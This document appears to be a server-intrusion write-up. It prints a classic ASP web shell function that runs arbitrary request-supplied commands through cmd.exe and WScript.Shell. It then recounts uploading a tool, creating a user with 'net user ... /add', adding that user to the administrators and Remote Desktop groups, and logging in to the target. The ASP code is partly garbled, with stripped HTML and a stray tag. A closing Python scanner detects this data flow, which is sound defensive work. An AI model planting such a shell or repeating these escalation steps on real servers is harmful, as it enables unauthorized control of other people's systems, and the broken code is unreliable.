Function CmdShell()
  If Request("SP")<>"" Then Session("ShellPath") = Request("SP")
  ShellPath=Session("ShellPath")
  if ShellPath="" Then ShellPath = "cmd.exe"
  if Request("wscript")="yes" then
    checked=" checked"
  else
    checked=""
  end if
  If Request("cmd")<>"" Then DefCmd = Request("cmd")
  SI="value='"&DefCmd&"'>value='运行'>"
  SI=SI&""
  If Request.Form("cmd")<>"" Then
    if Request.Form("wscript")="yes" then
      Set CM=CreateObject(ObT(1,0))
      Set DD=CM.exec(ShellPath&" /c "&DefCmd)
      aaa=DD.stdout.readall
      SI=SI&aaa
    else%>
      Call ws.Run (ShellPath&" /c " & DefCmd & " > " & szTempFile, 0, True)
      Set fs = CreateObject("Scripting.FileSystemObject")
      Set oFilelcx = fs.OpenTextFile (szTempFile, 1, False, 0)
      aaa=Server.HTMLEncode(oFilelcx.ReadAll)
      oFilelcx.Close
      Call fso.DeleteFile(szTempFile, True)
      SI=SI&aaa
    end if
  End If
  SI=SI&chr(13)&""
  SI=SI&"SHELL路径:value='"&ShellPath&"' Style='width:70%'> "
  SI=SI&"value='yes'"&checked&">WScript.Shell"
  Response.Write SI
End Function
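Next, upload the modified ftp2.exe and run D:webftp2.exe "net user user password /add" through wscript.shell, then check the result: a user has been added successfully. After adding that user to the administrators group and the "Remote desktop users" group, I logged in to the target server's remote desktop.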
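From the defender's side, the CmdShell function above can be caught by its data flow. The following is an added example, not code from the original post: a small Python scanner that follows request input through plain variables and Session values and reports where it reaches an `.exec` or `.Run` call, which still works when the ProgID is hidden behind a lookup such as `ObT(1,0)`. The name `scan_asp` and the benign sample are assumptions; the first sample is an excerpt of the page's own lines.

```python
import re

# Excerpt of the page's CmdShell lines, used as sample input.
SAMPLE = '''If Request("SP")<>"" Then Session("ShellPath") = Request("SP")
ShellPath=Session("ShellPath")
if ShellPath="" Then ShellPath = "cmd.exe"
If Request("cmd")<>"" Then DefCmd = Request("cmd")
Set CM=CreateObject(ObT(1,0))
Set DD=CM.exec(ShellPath&" /c "&DefCmd)
Call ws.Run (ShellPath&" /c " & DefCmd & " > " & szTempFile, 0, True)'''

# Constructed benign page: same COM object, fixed command, no request data.
BENIGN = '''Set sh = CreateObject("WScript.Shell")
sh.Run "iisreset /status", 0, True'''

SESSION = re.compile(r'session\s*\(\s*"([^"]*)"\s*\)', re.I)
SOURCE = re.compile(r'\brequest(?:\.\w+)?\s*\(')   # Request(), Request.Form(), ...
SINK = re.compile(r'\.(exec|run)\b\s*\(?')          # process-launching methods
ASSIGN = re.compile(r'^(?:set\s+)?(\w+)\s*=\s*(.+)$')
IDENT = re.compile(r'\w+')

def normalise(raw):
    """Fold Session("k") into one token, blank string literals, lowercase."""
    return re.sub(r'"[^"]*"', '""', SESSION.sub(r'session__\1', raw)).lower()

def is_tainted(expr, tainted):
    """True if expr reads the request directly or uses a tainted name."""
    return bool(SOURCE.search(expr)) or bool(set(IDENT.findall(expr)) & tainted)

def scan_asp(source):
    """Return (line, sink, tainted names) for each sink fed by request input."""
    tainted, findings = set(), []
    for lineno, raw in enumerate(source.splitlines(), 1):
        # Keep only the statement after a single-line "If ... Then".
        stmt = re.split(r'\bthen\b', normalise(raw))[-1].strip()
        sink = SINK.search(stmt)
        if sink and is_tainted(stmt[sink.end():], tainted):
            used = sorted(set(IDENT.findall(stmt[sink.end():])) & tainted)
            findings.append((lineno, sink.group(1), used))
        assign = ASSIGN.match(stmt)
        if assign and is_tainted(assign.group(2), tainted):
            tainted.add(assign.group(1))   # taint is never cleared (conservative)
    return findings

if __name__ == "__main__":
    for lineno, sink, names in scan_asp(SAMPLE):
        print(f"line {lineno}: request input reaches .{sink} via {names}")
```

A plain search for the string "WScript.Shell" finds nothing in the excerpt, which is why the scanner keys on the sink call and its arguments instead.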